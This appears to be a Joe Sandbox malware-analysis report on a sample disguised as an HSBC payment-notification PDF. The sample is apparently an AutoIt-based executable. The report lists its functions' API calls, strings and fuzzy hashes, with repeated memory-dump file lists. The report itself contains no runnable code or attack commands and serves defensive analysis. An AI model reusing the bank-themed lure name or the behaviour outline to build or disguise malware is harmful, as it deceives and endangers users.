Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
Instruction ID: 9368d54b81b13d28e750e9b7a77ce7499fab44d9898740901c219fded0589530
Opcode Fuzzy Hash: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
Instruction Fuzzy Hash: 7A91A4719897C0DACB21DBA894501ABBFF5AF69300F444D6FD1C6A3B41D238B908C76E

Function 00404E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00404D8E,?,?,00000000,00000000), ref: 00404E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404D8E,?,?,00000000,00000000), ref: 00404EB0
LoadResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D937
SizeofResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D94C
LockResource.KERNEL32(00404D8E,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F,00000000), ref: 0043D95F

Strings

SCRIPT, xrefs: 00404EA6

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
Instruction ID: 68981a4d98a1b9f26aaf18e99fd77eadcf83d6f3c297b7fdd3b7e429ee84fbe5
Opcode Fuzzy Hash: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
Instruction Fuzzy Hash: 59119EB0200300BFD7208B65EC48F2B7BBAFBC9B11F20467DF505D62A0DB71E8058665

Function 0040FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON

Download Yara Rule

Strings

%I, xrefs: 0040FCF3
pbL, xrefs: 004449B9

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: BuffCharUpper
String ID: pbL$%I
API String ID: 3964851224-1578263234
Opcode ID: af36b594a62b1b46a706a821ad2027e18fc2919dfda7762969ae66de67de28f6
Instruction ID: 7d186bf48a599790b4ae94b3728c2257f551fe3f353e5d611b392294ecc69107
Opcode Fuzzy Hash: af36b594a62b1b46a706a821ad2027e18fc2919dfda7762969ae66de67de28f6
Instruction Fuzzy Hash: C8927D706043419FD720DF15C480B6BB7E1BF89304F14896EE8999B392D779EC85CB9A

Function 0040E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

DdL, xrefs: 00443AF5
Variable must be of type 'Object'., xrefs: 00443E62
DdL, xrefs: 0040EAC1
DdL, xrefs: 00443B2E
DdL, xrefs: 0040EABA

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID: DdL$DdL$DdL$DdL$Variable must be of type 'Object'.
API String ID: 0-2838938394
Opcode ID: 2c35b3d26c95a021f08b930a365da4d97caa2da8ff1c5750d170567e5b24b5e9
Instruction ID: 023dab180a9d3d77a7e8607c3136a2e1727c845c037ec0be429657ea2820e701
Opcode Fuzzy Hash: 2c35b3d26c95a021f08b930a365da4d97caa2da8ff1c5750d170567e5b24b5e9
Instruction Fuzzy Hash: C3A29E75A00205CFDB24CF56C480AAAB7B1FF58314F24887BE905AB391D739ED52CB99

Function 009962E0 Relevance: 5.3, APIs: 3, Instructions: 791COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0b5a82f45acde5e3553618ce1b96864498784c25b9aed5e5b8b34973f5952d5
Instruction ID: d162a664d33f4e3034133f22e0cb8bc0e2635ef240dfc7ff26b2556d73f936ed
Opcode Fuzzy Hash: d0b5a82f45acde5e3553618ce1b96864498784c25b9aed5e5b8b34973f5952d5
Instruction Fuzzy Hash: 15327B3190D7409FCF378B1C8854A3A7B6CABE2364F9F46DAE4959B1E2E2359C44C352

Function 0046445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0043E398), ref: 0046446A
FindFirstFileW.KERNEL32(?,?), ref: 0046447B
FindClose.KERNEL32(00000000), ref: 0046448B

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
Instruction ID: 0270b6235cd3a211ff5fd07bbdee7491b27fcb3ec88e67c823a813e2b68c3cf0
Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
Instruction Fuzzy Hash: 54E0D8328105006B4610AB78EC0E4EE775C9E85335F100B6AFC35C11D0FB789904969F

Function 0099B6DE Relevance: 3.8, APIs: 2, Instructions: 836COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 0099BAFD

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: a6ffb6b238e7c674edc12143e2776e585c8a8f604771eba50be228205e460bc6
Instruction ID: 4f9d08e04ce9603a3c7a3a761875fc29470d1ee3dde3174079051e551d3a5ab7
Opcode Fuzzy Hash: a6ffb6b238e7c674edc12143e2776e585c8a8f604771eba50be228205e460bc6
Instruction Fuzzy Hash: 7652C42090D380DFCF368B2C9A54BB67BACAFA2334F0D459ED4958B1E2D7699C04D752

Function 0099A350 Relevance: 2.4, APIs: 1, Instructions: 919COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8320de408f077a5ba1cef5d2bdec01b2f97d017fff62df46860ef55446d6169
Instruction ID: 05c314c55dc32352456cf0b9d46491f743bece3a879fbcf32c4374caec60ccec
Opcode Fuzzy Hash: b8320de408f077a5ba1cef5d2bdec01b2f97d017fff62df46860ef55446d6169
Instruction Fuzzy Hash: 7D62B52150D3C09EDF368A6C88197377FE89B63318F5D459EE4858A5E3DA699C08C3A3

Function 004109D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410A5B
timeGetTime.WINMM ref: 00410D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410E53
Sleep.KERNEL32(0000000A), ref: 00410E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00410EFA
DestroyWindow.USER32 ref: 00410F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00410F20
Sleep.KERNEL32(0000000A,?,?), ref: 00444E83
TranslateMessage.USER32(?), ref: 00445C60
DispatchMessageW.USER32(?), ref: 00445C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00445C82

Strings

@GUI_CTRLHANDLE, xrefs: 00444FE4
pbL, xrefs: 004457B4
pbL, xrefs: 00444FAE
pbL, xrefs: 00445003
@GUI_WINHANDLE, xrefs: 00444F8F
@COM_EVENTOBJ, xrefs: 004454F0
@GUI_CTRLID, xrefs: 00444F3A
@TRAY_ID, xrefs: 0044578F
pbL, xrefs: 00444F59

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbL$pbL$pbL$pbL
API String ID: 4212290369-1082885916
Opcode ID: 22953a632be6e99ab3a0f862b83bb2db57b04dfb79848c2b67eb913c91596a46
Instruction ID: d38973a2ad724f636fdb88fa2895c4b9f48f3c0ad1428ec49bcc8c13362f202a
Opcode Fuzzy Hash: 22953a632be6e99ab3a0f862b83bb2db57b04dfb79848c2b67eb913c91596a46
Instruction Fuzzy Hash: BBB29470608741DFEB24DF24C445BABB7E4BF84304F14492FE54997292D779E885CB8A

Function 0099597D Relevance: 25.8, APIs: 13, Strings: 1, Instructions: 1348threadCOMMON

Download Yara Rule

APIs

RtlExitUserThread.NTDLL(00000000), ref: 009958C7
CreateThread.KERNEL32(00000000), ref: 00995915

Strings

gfff, xrefs: 00999F3B

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Thread$CreateExitUser
String ID: gfff
API String ID: 4108186749-1553575800
Opcode ID: dd12b463400ba7475bec717f7dc94be9b35955e585eb825d357a737a65c32201
Instruction ID: 9e57c8afd9179a6a0f35bb74600a5d4fe1b2401f255d0349116d0dc7566a0c8a
Opcode Fuzzy Hash: dd12b463400ba7475bec717f7dc94be9b35955e585eb825d357a737a65c32201
Instruction Fuzzy Hash: 14A2292050D7809EDF378B2C991973B7FAC5BA3724F4E458EE0958B1E2D6699C08D363

Function 00469155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00468F5F: __time64.LIBCMT ref: 00468F69

Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD

__wsplitpath.LIBCMT ref: 00469234

Part of subcall function 004240FB: __wsplitpath_helper.LIBCMT ref: 0042413B

_wcscpy.LIBCMT ref: 00469247
_wcscat.LIBCMT ref: 0046925A
__wsplitpath.LIBCMT ref: 0046927F
_wcscat.LIBCMT ref: 00469295
_wcscat.LIBCMT ref: 004692A8

Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FDE
Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FED

_wcscmp.LIBCMT ref: 004691EF

Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469452
_wcsncpy.LIBCMT ref: 004694C5
DeleteFileW.KERNEL32(?,?), ref: 004694FB
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00469511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469522
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469534

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 1fdc1389585ee25c9ba0c3a9ed97a450cce0af2ebfbc5111a641a9f349b24362
Instruction ID: 02a21988af13e7247216c1d96107bbd8e14577c6ac0cce12fd44c5267f831f24
Opcode Fuzzy Hash: 1fdc1389585ee25c9ba0c3a9ed97a450cce0af2ebfbc5111a641a9f349b24362
Instruction Fuzzy Hash: 22C13DB1900129AADF11DF95CC81ADEB7BCEF85314F0040ABF609E6251EB749E858F69

Function 00403015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00403074
RegisterClassExW.USER32(00000030), ref: 0040309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
InitCommonControlsEx.COMCTL32(?), ref: 004030CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
LoadIconW.USER32(000000A9), ref: 004030F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101

Strings

+, xrefs: 0040305D
TaskbarCreated, xrefs: 004030A4
0, xrefs: 00403056
AutoIt v3 GUI, xrefs: 00403090

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
Instruction ID: 4440f0663549e4d62e3da2fdffcae7bb40582d53fb7b12173dce245a48cd956c
Opcode Fuzzy Hash: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
Instruction Fuzzy Hash: 5F317A71801348AFDB50DFA4DC84A9DBFF0FB09310F24456EE480E62A0D7B91599CF69

Function 00403041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00403074
RegisterClassExW.USER32(00000030), ref: 0040309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
InitCommonControlsEx.COMCTL32(?), ref: 004030CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
LoadIconW.USER32(000000A9), ref: 004030F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101

Strings

+, xrefs: 0040305D
TaskbarCreated, xrefs: 004030A4
0, xrefs: 00403056
AutoIt v3 GUI, xrefs: 00403090

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
Instruction ID: 5f72cbcfe52bedf9aac6cae92f5874e6cc1455117f94183018d2e1bba946cea4
Opcode Fuzzy Hash: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
Instruction Fuzzy Hash: DD21F9B1911208AFEB40EF94EC48B9DBBF4FB08700F10453AF511A62A0D7B555948FA9

Function 0040708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C52F8,?,004037AE,?), ref: 00404724

Part of subcall function 0042050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00407165), ref: 0042052D

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004071A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043E8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043E909
RegCloseKey.ADVAPI32(?), ref: 0043E947
_wcscat.LIBCMT ref: 0043E9A0

Strings

\Include\, xrefs: 00407165
Include, xrefs: 0043E8BF, 0043E900
Software\AutoIt v3\AutoIt, xrefs: 0040719E
\, xrefs: 0043E9C3

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 3dc34742f8a7bc767ebd921b8f511a1c2b55e9980e44eb1467a7df652b5eb101
Instruction ID: d25a402f486e77f999364444344266e14871576642d40cf04fb282302ec68e46
Opcode Fuzzy Hash: 3dc34742f8a7bc767ebd921b8f511a1c2b55e9980e44eb1467a7df652b5eb101
Instruction Fuzzy Hash: E9718E71509301AEC340EF26E841D5BBBE8FF88314F51893FF445972A1DB79A948CB5A

Function 00403633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
KillTimer.USER32(?,00000001), ref: 004036FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
CreatePopupMenu.USER32 ref: 0040373E
PostQuitMessage.USER32(00000000), ref: 0040374D

Strings

%I, xrefs: 0043D081, 0043D0CF
TaskbarCreated, xrefs: 00403725

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%I
API String ID: 129472671-1195164674
Opcode ID: d085891fbce4ac700e19f77706549dbb7e8c65c9ecaa69f5eff41dbd37e5b37c
Instruction ID: dec945db719cbeb7d7ffc5e313a4f07f26295059660cff28048481092df75402
Opcode Fuzzy Hash: d085891fbce4ac700e19f77706549dbb7e8c65c9ecaa69f5eff41dbd37e5b37c
Instruction Fuzzy Hash: F34127B1110505ABDB246F68EC09F7E3E98EB44302F50453BF602A63E1C67EAD95972E

Function 00403A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00403A50
LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
LoadIconW.USER32(00000063), ref: 00403A76
LoadIconW.USER32(000000A4), ref: 00403A88
LoadIconW.USER32(000000A2), ref: 00403A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
RegisterClassExW.USER32(?), ref: 00403B16

Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101

Strings

0, xrefs: 00403AF4
AutoIt v3, xrefs: 00403B05
#, xrefs: 00403AFB

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

